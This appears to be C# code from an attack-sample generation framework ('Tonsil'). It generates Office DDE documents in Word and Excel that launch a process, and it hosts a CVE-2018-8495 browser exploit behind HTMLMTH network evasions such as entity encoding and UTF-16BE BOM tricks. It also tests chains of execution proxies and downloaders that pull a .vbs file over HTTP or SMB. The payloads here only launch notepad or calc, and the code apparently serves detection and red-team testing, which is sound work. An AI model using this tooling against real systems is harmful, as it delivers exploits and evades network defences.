public static IEnumerable <Tonsil.Files.File> GetAllFilesRead(Tonsil.Processes.Process process, bool remoteOnly = true) { var filesRead = new List <Tonsil.Files.File>(); foreach (var file in process.FilesRead) { if (!remoteOnly || typeof(Tonsil.Files.RemoteFilePath).IsInstanceOfType(file.FilePath)) { filesRead.Add(file); } } foreach (var childProcess in process.ChildProcesses) { var files = GetAllFilesRead(childProcess); foreach (var file in files) { if (!remoteOnly || typeof(Tonsil.Files.RemoteFilePath).IsInstanceOfType(file.FilePath)) { filesRead.Add(file); } } } return(filesRead); }
// Office DDE Example private static IAttack OfficeDdeExample() { var samplesOutput = new SamplesOutput(); var attackName = "OfficeDde"; var attack = new Attack(new IOutput[] { samplesOutput, }, name: attackName); var cmdline = new Tonsil.Processes.CmdLine() { image = @"notepad", arguments = new string[] { } }; var process = new Tonsil.Processes.Process(cmdline); var processList = new ProcessList(new[] { process }); var wordDde = new WordDDE(processList); var wordDdeFilename = "WordDDE" + "." + wordDde.Extension; samplesOutput.Add(wordDdeFilename, wordDde); var excelDde = new ExcelDDE(processList); var excelDdeFilename = "ExcelDDE" + "." + excelDde.Extension; samplesOutput.Add(excelDdeFilename, excelDde); attack.Generate(); return(attack); }
private static System.Diagnostics.Process[] GetProcesses(Tonsil.Processes.Process targetProcess) { Tonsil.Processes.CmdLine cmdline = targetProcess.CmdLine; System.IO.FileInfo fi = new System.IO.FileInfo(cmdline.image); string processName = fi.Name; string friendlyName = System.IO.Path.GetFileNameWithoutExtension(processName); System.Diagnostics.Process[] processes = System.Diagnostics.Process.GetProcessesByName(friendlyName); return(processes); }
private static void KillProcesses(Tonsil.Processes.Process targetProcess) { System.Diagnostics.Process[] processes = GetProcesses(targetProcess); foreach (var proc in processes) { try { proc.Kill(); } catch { Console.WriteLine("Failed to kill process."); } } }
// Kill targetProcess; Executes processUnderTest; checks if targetProcess is descendent of processUnderTest; kill targetProcess public static bool TestExecutionProxy(Tonsil.Processes.Process processUnderTest, Tonsil.Processes.Process targetProcess) { KillProcesses(targetProcess); System.Diagnostics.ProcessStartInfo si = new System.Diagnostics.ProcessStartInfo() { FileName = processUnderTest.CmdLine.image, Arguments = string.Join(" ", processUnderTest.CmdLine.arguments), RedirectStandardOutput = false, RedirectStandardError = false, RedirectStandardInput = false, UseShellExecute = false, WindowStyle = System.Diagnostics.ProcessWindowStyle.Hidden }; System.Diagnostics.Process rootProcess = System.Diagnostics.Process.Start(si); //System.Threading.Thread.Sleep(2 * 1000); rootProcess.WaitForExit(1000); var processes = GetProcesses(targetProcess); KillProcesses(targetProcess); return(processes.Length > 0); }
private static IAttack HtmlmthServerOutputExample() { // Note: This sample can't use HOSTNAME = HostnameB since port 80 on HostnameB is already occupied by the HTTP Server from Sample4 var HOSTNAME = "HostnameC1"; // the DNS name "HostnameC1" points to the virtual host "VirtualHostC" var VIRTUALHOST = "VirtualHostC"; var HOST = Host.GetHostByHostName(HOSTNAME) ?? new Host(VIRTUALHOST, HOSTNAME, null); var htmlmthServerOutput = new HtmlmthServerOutput(HOST); // the default port is 80 var attackName = "HtmlmthServerOutput"; var attack = new Attack(new IOutput[] { htmlmthServerOutput, }, name: attackName); // This represents a commandline used to create a new process var cmdline = new Tonsil.Processes.CmdLine() { image = @"calc", arguments = new string[] { } }; var process = new Tonsil.Processes.Process(cmdline); // List of commandlines var processList = new ProcessList(new[] { process }); // Note: this exploit enforces a ProcessList size of size 1 var exploitWebsite = new CVE_2018_8495(processList); // Network Evasions to apply to the delivery of the exploit var exploitEvasions = new[] { // Refer to HTMLMTH documentation & source code for the available evasions "htmlmth.evasions.html.entity_encoding_attributes_dec", "htmlmth.evasions.html.external_resource_internal_script", "htmlmth.evasions.html.insert_slash_after_opening_tag_names", "htmlmth.evasions.html.bom_declared_utf_16be_encoded_as_utf_16_be" }; // HtmlmthWebsite represents the HTTP resource(s) hosted by HTMLMTH server var exploitHtmlmthWebsite = new HtmlmthWebsite(exploitWebsite, HOST, exploitEvasions); // Dont forget to bookkeep htmlmthServerOutput.Add(exploitHtmlmthWebsite); attack.Generate(); // The files needed to launch the HTMLMTH server should now be at $(ProjectDir)\bin\$(Configuration)\$(TargetFramework)\Output\Server\HostnameB\80_HTMLMTH_Server return(attack); }
public static bool TestDownloader(Tonsil.Processes.Process processUnderTest, Tonsil.Files.File sourceFile, Tonsil.Files.File destinationFile) { System.IO.File.Delete(destinationFile.FilePath.Path); System.Diagnostics.ProcessStartInfo si = new System.Diagnostics.ProcessStartInfo() { FileName = processUnderTest.CmdLine.image, Arguments = string.Join(" ", processUnderTest.CmdLine.arguments), RedirectStandardOutput = false, RedirectStandardError = false, RedirectStandardInput = false, UseShellExecute = false, WindowStyle = System.Diagnostics.ProcessWindowStyle.Hidden }; System.Diagnostics.Process rootProcess = System.Diagnostics.Process.Start(si); System.Threading.Thread.Sleep(2 * 1000); rootProcess.WaitForExit(1000); bool result = System.IO.File.Exists(destinationFile.FilePath.Path); System.IO.File.Delete(destinationFile.FilePath.Path); return(result); }
public static Dictionary <string, bool> TestExecutionProxyDownloaders() { Dictionary <string, bool> results = new Dictionary <string, bool>(); string serverHost = ""; Tonsil.Files.HttpFilePath httpFilePath = new Tonsil.Files.HttpFilePath() { Host = serverHost, Port = 80, Directory = "/somedir/", Filename = "somefile.vbs" }; Tonsil.Files.SmbFilePath smbFilePath = new Tonsil.Files.SmbFilePath() { Host = serverHost, Port = 445, ShareName = "someshare", Directory = @"\somedir\", Filename = "somefile.vbs" }; Tonsil.Files.LocalFilePath localFilePath = new Tonsil.Files.LocalFilePath() { Directory = @"c:\", Filename = "somefile.vbs" }; List <Tonsil.Files.FilePath> filePaths = new List <Tonsil.Files.FilePath>() { httpFilePath, smbFilePath }; Tonsil.Files.File destinationFile = new Tonsil.Files.File() { FileType = Tonsil.Files.FileType.VBScript, FilePath = localFilePath }; Type downloaderParentType = typeof(Tonsil.Processes.Downloaders.Downloader); Assembly assembly = downloaderParentType.Assembly; Type[] types = assembly.GetTypes(); IEnumerable <Type> downloaderSubclasses = types.Where(t => t.IsSubclassOf(downloaderParentType)); Type executionProxyParentType = typeof(Tonsil.Processes.ExecutionProxys.ExecutionProxy); IEnumerable <Type> executionProxySubclasses = types.Where(t => t.IsSubclassOf(executionProxyParentType)); foreach (Type executionProxyType in executionProxySubclasses) { foreach (Type downloaderType in downloaderSubclasses) { foreach (var filePath in filePaths) { Tonsil.Files.File sourceFile = new Tonsil.Files.File() { FilePath = filePath }; Tonsil.Processes.Downloaders.Downloader downloadProcessUnderTest = (Tonsil.Processes.Downloaders.Downloader)Activator.CreateInstance(downloaderType); if (downloadProcessUnderTest.IsValidSource(sourceFile) && downloadProcessUnderTest.IsValidDestination(sourceFile, destinationFile)) { downloadProcessUnderTest.AddDownload(sourceFile, destinationFile); Tonsil.Processes.Process targetProcess = downloadProcessUnderTest; Tonsil.Processes.ExecutionProxys.ExecutionProxy processUnderTest = (Tonsil.Processes.ExecutionProxys.ExecutionProxy)Activator.CreateInstance(executionProxyType); processUnderTest.AddCmdlineExecution(targetProcess); bool result = TestDownloader(processUnderTest, sourceFile, destinationFile); Console.WriteLine(string.Format("{1}: \t{0}", processUnderTest.CmdLine.ToString(), result ? "Pass" : "Fail")); results.Add(processUnderTest.CmdLine.ToString(), result); } } } } return(results); }